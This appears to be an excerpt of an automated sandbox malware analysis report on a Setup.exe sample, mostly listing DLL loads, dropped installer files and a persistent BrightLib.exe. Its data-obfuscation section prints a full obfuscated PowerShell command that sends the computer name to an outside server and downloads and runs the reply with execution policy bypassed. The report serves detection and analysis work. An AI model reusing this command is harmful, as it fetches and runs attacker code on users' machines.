              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpWindow found: window name: TMainFormJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Setup.exeStatic file information: File size 1543377 > 1048576
              Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2478739178.00000000386C0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453154632.000000000367D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2478739178.00000000386C0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2453154632.000000000367D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1931860240.0000000007926000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; FgJump to behavior
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe.0.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe.0.drStatic PE information: section name: .didata
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.6.drStatic PE information: section name: .didata
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0205EA26 push eax; mov dword ptr [esp], FAFB0405h0_2_0205EA34
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203988B push edx; ret 0_2_0203988C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0202E0D8 push esi; ret 0_2_0202E0DC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02061526 push eax; mov dword ptr [esp], 828D8CBFh0_2_0206152B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D43655 push ebx; iretd 2_2_04D436DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D43645 push ebx; iretd 2_2_04D436DA
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeFile created: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-7IJ4L.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeFile created: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpFile created: C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
